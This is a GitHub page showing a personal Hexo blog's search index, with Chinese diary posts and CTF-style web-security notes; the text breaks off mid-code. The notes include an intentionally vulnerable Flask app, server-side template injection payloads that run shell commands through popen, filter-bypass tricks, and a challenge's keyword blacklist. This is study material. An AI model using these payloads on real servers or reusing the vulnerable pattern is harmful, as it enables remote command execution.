-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathlocal-search.xml
More file actions
1549 lines (741 loc) · 442 KB
/
local-search.xml
File metadata and controls
1549 lines (741 loc) · 442 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>diary</title>
<link href="/2026/01/05/diary-2026-1-4/"/>
<url>/2026/01/05/diary-2026-1-4/</url>
<content type="html"><![CDATA[<h1 id="2026-1-4-13-04-05"><a href="#2026-1-4-13-04-05" class="headerlink" title="2026_1_4 13:04:05"></a>2026_1_4 13:04:05</h1><ul><li><p>今天分享一个网站<br><a href="https://idcflare.com/">idcflare</a><br><img src="https://gitee.com/fogpost/photo/raw/master/202601041333515.png" srcset="/img/loading.gif" lazyload alt="图片介绍"><br>一个挺好的资源分享网站,目标是回到最开始的互联网净土,我受够-csdn了。</p></li><li><p>今天继续c coding,大概完成一个篇章十个题吧,<br>下午去检查眼睛和买新鞋子了。眼睛结果出来了,结膜炎,敷点药和早点休息,不能再熬夜了,每天要多休息才行</p></li><li><p>继续读书分享win32api,基本只读完了序言,了解了以下基本的学习路线,打算这个月先吧这本书读完,这两天又发现了许多资料,其实自己完全不用去找新的在自己的学习网站中把老的先学完好一点</p></li><li><p>感觉还是得字数多一点,要反复修改以下自己的文章,每一篇的字数感觉至少要到400-500的样子才好</p></li></ul><h1 id="2026-1-5-19-48-56"><a href="#2026-1-5-19-48-56" class="headerlink" title="2026_1_5 19:48:56"></a>2026_1_5 19:48:56</h1><ul><li><p>想想凑字数的话还是先把这篇写长一点后面有想法了再分开来,之后还要好好的把之前的文章整理以下,许多废文和不完整的可以整理,多用用草稿,今天下午才开始吧代码写起来,现在还困困的,每天写不了多少,今天6个题都不知道写不写的完,书还没开始看</p></li><li><p>切实感受到在学校里面还是好学一点,在家里面下午来个人就吵得要死,根本干不了事情,本来想睡觉得搞得现在还昏昏得打算小睡一下再开始写代码</p></li><li><p>又想到一个点可以把自己得代码贴上来,前提是有点意思得才行,不然还是有点水了,对了昨天晚上还在想自己得视频计划呢,打算每周六周日得时候发一篇文章才行,15~20min得视频5000字得稿子就行,还得抽时间写稿子,好多事情,今天早上还没干什么。</p></li><li><p>信息流这件事还忘记说了,我要在搞毕设还有那个网络设计我都忘记了。之后给网站还要加上外部连接以及RSS效果,之前没加是忘记了还是怎么,对了,之后想用Django吧网站重构一下,可能得几个月后了,总之先这样</p></li></ul><h1 id="2026-1-6-20-53-34"><a href="#2026-1-6-20-53-34" class="headerlink" title="2026_1_6 20:53:34"></a>2026_1_6 20:53:34</h1><ul><li>刚刚看了以下obstain的全自动化本地网络自动上传确实好,还有本博客的update也有点问题,预计未来几天不会更新会专注与更新相关的内容,期待下周与各位的见面</li></ul>]]></content>
<tags>
<tag>diary</tag>
</tags>
</entry>
<entry>
<title>新的开始</title>
<link href="/2025/12/25/%E6%96%B0%E7%9A%84%E5%BC%80%E5%A7%8B/"/>
<url>/2025/12/25/%E6%96%B0%E7%9A%84%E5%BC%80%E5%A7%8B/</url>
<content type="html"><![CDATA[<h2 id="过去的总结"><a href="#过去的总结" class="headerlink" title="过去的总结"></a>过去的总结</h2><p>目前也算是把考研结束了接下来还有许多事情要看先定个基调,blog还是要转换到这个hexo上面来才行,之前Notion上面虽然好用但感觉还是有部分不足,果然还是原生本位的好用,用马哲的话来讲就是否定之否定了。</p><h2 id="之后的目标"><a href="#之后的目标" class="headerlink" title="之后的目标"></a>之后的目标</h2><p>从轻重缓急来设定几个目标把</p><h3 id="急迫"><a href="#急迫" class="headerlink" title="急迫"></a>急迫</h3><ol><li>眼前1月15日的c语言程序设计</li><li>还有一个毕设</li></ol><h3 id="中等"><a href="#中等" class="headerlink" title="中等"></a>中等</h3><ol><li>看完c++反汇编与逆向分析这本书</li><li>多逆逆自己写的c</li><li>pwpw和wewe</li></ol><h3 id="较弱"><a href="#较弱" class="headerlink" title="较弱"></a>较弱</h3><ol><li>玩完witch3</li></ol><h3 id="额外目标"><a href="#额外目标" class="headerlink" title="额外目标"></a>额外目标</h3><ol><li>打算利用django去把自己的blog重构一个</li><li>打算写一个ctf聚合网站</li></ol><h3 id="变成习惯"><a href="#变成习惯" class="headerlink" title="变成习惯"></a>变成习惯</h3><ul><li>学习英语</li></ul><p>就这样吧,之后陆续更新把notion和这几个月来的东西传到网站上。</p>]]></content>
<tags>
<tag>diary</tag>
</tags>
</entry>
<entry>
<title>2025</title>
<link href="/2025/02/24/2025/"/>
<url>/2025/02/24/2025/</url>
<content type="html"><![CDATA[<p>一晃眼就已经是2025年了,去年的烦恼还没有散去,今年的烦恼就已经找上门来了,这一篇算是鼓励也算是警醒吧,说是有多忙,其实倒也没多少事,完成以下几件事是目前的需要</p><ul><li><p>完成程序设计课程</p></li><li><p>继续学习web的相关知识为之后的hvv做好准备</p></li><li><p>准备好考研的相关事宜<br>这个学期没有什么课程,技术方向的事情便可以有时间提升,剩下的想到再补吧<br>ps: 锻炼也要跟上,老是想玩游戏,总是忍不住去玩而不是精进自己也算是要完成的事吧</p></li><li><p>个人能力<br><img src="https://gitee.com/fogpost/photo/raw/master/202502241730506.png" srcset="/img/loading.gif" lazyload></p></li></ul>]]></content>
</entry>
<entry>
<title>web的js小知识</title>
<link href="/2025/01/11/web%E7%9A%84js%E5%B0%8F%E7%9F%A5%E8%AF%86/"/>
<url>/2025/01/11/web%E7%9A%84js%E5%B0%8F%E7%9F%A5%E8%AF%86/</url>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>javacript教程,在许多网页小游戏中,就用到了js,类似的还有js<br>JavaScript 是 web 开发人员必须学习的 3 门语言中的一门:<br> HTML 定义了网页的内容<br> CSS 描述了网页的布局<br> JavaScript 控制了网页的行为</p><h2 id="JSFUCK"><a href="#JSFUCK" class="headerlink" title="JSFUCK"></a>JSFUCK</h2><figure class="highlight scheme"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs scheme">[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]][([][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+([][[]]+[])[<span class="hljs-name">+!+</span>[]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]+([][[]]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]]((<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">+!+</span>[]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!</span>[]+[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]])[<span class="hljs-name">!+</span>[]+!+[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+[<span class="hljs-name">+!+</span>[]]+(<span class="hljs-name">!!</span>[]+[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]])[<span class="hljs-name">!+</span>[]+!+[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]])()<br></code></pre></td></tr></table></figure><p>这一段是alert(1),再开发者工具的console(控制台)中运行即可。</p>]]></content>
<categories>
<category>WEB</category>
</categories>
<tags>
<tag>web</tag>
</tags>
</entry>
<entry>
<title>flask模板注入</title>
<link href="/2025/01/10/flask%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/"/>
<url>/2025/01/10/flask%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/</url>
<content type="html"><![CDATA[<h1 id="flask模板注入"><a href="#flask模板注入" class="headerlink" title="flask模板注入"></a>flask模板注入</h1><p>作为 Web 中的难点还是有必要涉猎一番<br>参考文章: <a href="https://xz.aliyun.com/t/3679?time__1311=n4+xnii=oGqmqDK0QDODlx6e0=bG=KtezkWGb84D">flask之ssti模版注入从零到入门</a></p><h2 id="模板代码"><a href="#模板代码" class="headerlink" title="模板代码"></a>模板代码</h2><p>代码基于 Python,使用 Flask 框架,模板使用 Jinja2,需要额外下载 Flask 和 Jinja2,用 PyCharm 可能会简单一点。<br>解释:<code>index</code> 是没有漏洞点的,漏洞点在 <code>test</code> 中。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> Flask<br><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> render_template<br><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> request<br><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> render_template_string<br><br>app = Flask(__name__)<br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">'/'</span></span>)</span><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">'/index'</span></span>) </span><span class="hljs-comment"># 我们访问 / 或 /index 都会跳转</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">index</span>():<br> <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">"index.html"</span>, title=<span class="hljs-string">'Home'</span>, user=request.args.get(<span class="hljs-string">"key"</span>))<br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">'/test'</span>, methods=[<span class="hljs-string">'GET'</span>, <span class="hljs-string">'POST'</span>]</span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">test</span>():<br> template = <span class="hljs-string">'''</span><br><span class="hljs-string"> <div class="center-content error"></span><br><span class="hljs-string"> <h1>Oops! That page doesn't exist.</h1></span><br><span class="hljs-string"> <h3>%s</h3></span><br><span class="hljs-string"> </div> </span><br><span class="hljs-string"> '''</span> % request.url<br><br> <span class="hljs-keyword">return</span> render_template_string(template)<br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">'__main__'</span>:<br> app.debug = <span class="hljs-literal">True</span><br> app.run()<br></code></pre></td></tr></table></figure><h3 id="示例-index-html"><a href="#示例-index-html" class="headerlink" title="示例 index.html"></a>示例 <code>index.html</code></h3><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag"><<span class="hljs-name">html</span>></span><br> <span class="hljs-tag"><<span class="hljs-name">head</span>></span><br> <span class="hljs-tag"><<span class="hljs-name">title</span>></span>{{ title }} - 小猪佩奇<span class="hljs-tag"></<span class="hljs-name">title</span>></span><br> <span class="hljs-tag"></<span class="hljs-name">head</span>></span><br> <span class="hljs-tag"><<span class="hljs-name">body</span>></span><br> <span class="hljs-tag"><<span class="hljs-name">h1</span>></span>Hello, {{ user.name }}!<span class="hljs-tag"></<span class="hljs-name">h1</span>></span><br> <span class="hljs-tag"></<span class="hljs-name">body</span>></span><br><span class="hljs-tag"></<span class="hljs-name">html</span>></span><br></code></pre></td></tr></table></figure><h3 id="SSTI-利用示例"><a href="#SSTI-利用示例" class="headerlink" title="SSTI 利用示例"></a>SSTI 利用示例</h3><p>利用 Python 的类继承,我们可以反向调用其他的函数。<br>一般是 <code><class 'os._wrap_close'></code>,每个版本不同,Python 3.8 中为 <code>133</code>。</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">http://127.0.0.1:5000/test?key={{"".__class__.__bases__[0].__subclasses__()[133].__init__.__globals__['popen']('dir').read()}}<br></code></pre></td></tr></table></figure><p><img src="https://gitee.com/fogpost/photo/raw/master/202501101750658.png" srcset="/img/loading.gif" lazyload></p><h2 id="CTF-中的一些绕过-Tips"><a href="#CTF-中的一些绕过-Tips" class="headerlink" title="CTF 中的一些绕过 Tips"></a>CTF 中的一些绕过 Tips</h2><ol><li><p><strong>过滤 <code>[]</code> 等括号</strong><br>使用 <code>getitem</code> 绕过。例如原 POC:<code>{{"".class.bases[0]}}</code><br>绕过后:<code>{{"".class.bases.getitem(0)}}</code></p></li><li><p><strong>过滤 <code>subclasses</code>,拼凑法</strong><br>原 POC:<code>{{"".class.bases[0].subclasses()}}</code><br>绕过后:<code>{{"".class.bases[0]['subcla' + 'sses']}}</code></p></li><li><p><strong>过滤 <code>class</code></strong><br>使用 <code>session</code> 绕过:<br>POC:<code>{{session['cla' + 'ss'].bases[0].bases[0].bases[0].bases[0].subclasses()[133]}}</code></p><p>多个 <code>bases[0]</code> 是因为一直在向上找 <code>object</code> 类。使用 <code>mro</code> 更方便: </p><ul><li><code>{{session['__cla' + 'ss__'].__mro__[12]}}</code><br>或 </li><li><code>{{request['__cl' + 'ass__'].__mro__[12]}}</code></li></ul></li></ol><!-- 4. **`timeit` 姿势** --><p>示例:<a href="https://www.secpulse.com/archives/65568.html">2017 SWPU-CTF 的一道沙盒 Python 题</a></p><h2 id="一张图总结一下-SSTI-的一些模板渲染引擎及利用"><a href="#一张图总结一下-SSTI-的一些模板渲染引擎及利用" class="headerlink" title="一张图总结一下 SSTI 的一些模板渲染引擎及利用"></a>一张图总结一下 SSTI 的一些模板渲染引擎及利用</h2><p><img src="https://gitee.com/fogpost/photo/raw/master/202501101756362.png" srcset="/img/loading.gif" lazyload></p>]]></content>
<categories>
<category>WEB</category>
</categories>
<tags>
<tag>web</tag>
</tags>
</entry>
<entry>
<title>ciscnwp复现</title>
<link href="/2025/01/10/ciscnwp%E5%A4%8D%E7%8E%B0/"/>
<url>/2025/01/10/ciscnwp%E5%A4%8D%E7%8E%B0/</url>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>鼓起勇气面对ciscn,慢慢的对着wp复现,加油加油加油</p><h2 id="web"><a href="#web" class="headerlink" title="web"></a>web</h2><h3 id="hello-web"><a href="#hello-web" class="headerlink" title="hello_web"></a>hello_web</h3><p>经典的ssrf,其实都完成得差不多了,在面对蚁剑的bypass时我们卡在了这里,于是没有打通,关于蚁剑的bypass,我额外写了一个bypass的文章,这里就不赘述了,同时本体还有双写绕过以及php特性的利用,[转化为_</p><h3 id="Safe-Proxy"><a href="#Safe-Proxy" class="headerlink" title="Safe_Proxy"></a>Safe_Proxy</h3><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> Flask, request,render_template_string<br><span class="hljs-keyword">import</span> socket<br><span class="hljs-keyword">import</span> threading<br><span class="hljs-keyword">import</span> html<br><br>app = Flask(__name__)<br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">'/'</span>, methods=[<span class="hljs-string">"GET"</span>]</span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">source</span>():<br> <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(__file__, <span class="hljs-string">'r'</span>, encoding=<span class="hljs-string">'utf-8'</span>) <span class="hljs-keyword">as</span> f:<br> <span class="hljs-keyword">return</span> <span class="hljs-string">'<pre>'</span>+html.escape(f.read())+<span class="hljs-string">'</pre>'</span><br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">'/'</span>, methods=[<span class="hljs-string">"POST"</span>]</span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">template</span>():<br> template_code = request.form.get(<span class="hljs-string">"code"</span>)<br> <span class="hljs-comment"># 安全过滤</span><br> blacklist = [<span class="hljs-string">'__'</span>, <span class="hljs-string">'import'</span>, <span class="hljs-string">'os'</span>, <span class="hljs-string">'sys'</span>, <span class="hljs-string">'eval'</span>, <span class="hljs-string">'subprocess'</span>, <span class="hljs-string">'popen'</span>, <span class="hljs-string">'system'</span>, <span class="hljs-string">'\r'</span>, <span class="hljs-string">'\n'</span>]<br> <span class="hljs-keyword">for</span> black <span class="hljs-keyword">in</span> blacklist:<br> <span class="hljs-keyword">if</span> black <span class="hljs-keyword">in</span> template_code:<br> <span class="hljs-keyword">return</span> <span class="hljs-string">"Forbidden content detected!"</span><br> result = render_template_string(template_code)<br> <span class="hljs-built_in">print</span>(result)<br> <span class="hljs-keyword">return</span> <span class="hljs-string">'ok'</span> <span class="hljs-keyword">if</span> result <span class="hljs-keyword">is</span> <span class="hljs-keyword">not</span> <span class="hljs-literal">None</span> <span class="hljs-keyword">else</span> <span class="hljs-string">'error'</span><br><br><span class="hljs-keyword">class</span> <span class="hljs-title class_">HTTPProxyHandler</span>:<br> <span class="hljs-keyword">def</span> <span class="hljs-title function_">__init__</span>(<span class="hljs-params">self, target_host, target_port</span>):<br> <span class="hljs-variable language_">self</span>.target_host = target_host<br> <span class="hljs-variable language_">self</span>.target_port = target_port<br><br> <span class="hljs-keyword">def</span> <span class="hljs-title function_">handle_request</span>(<span class="hljs-params">self, client_socket</span>):<br> <span class="hljs-keyword">try</span>:<br> request_data = <span class="hljs-string">b""</span><br> <span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br> chunk = client_socket.recv(<span class="hljs-number">4096</span>)<br> request_data += chunk<br> <span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(chunk) < <span class="hljs-number">4096</span>:<br> <span class="hljs-keyword">break</span><br><br> <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> request_data:<br> client_socket.close()<br> <span class="hljs-keyword">return</span><br><br> <span class="hljs-keyword">with</span> socket.socket(socket.AF_INET, socket.SOCK_STREAM) <span class="hljs-keyword">as</span> proxy_socket:<br> proxy_socket.connect((<span class="hljs-variable language_">self</span>.target_host, 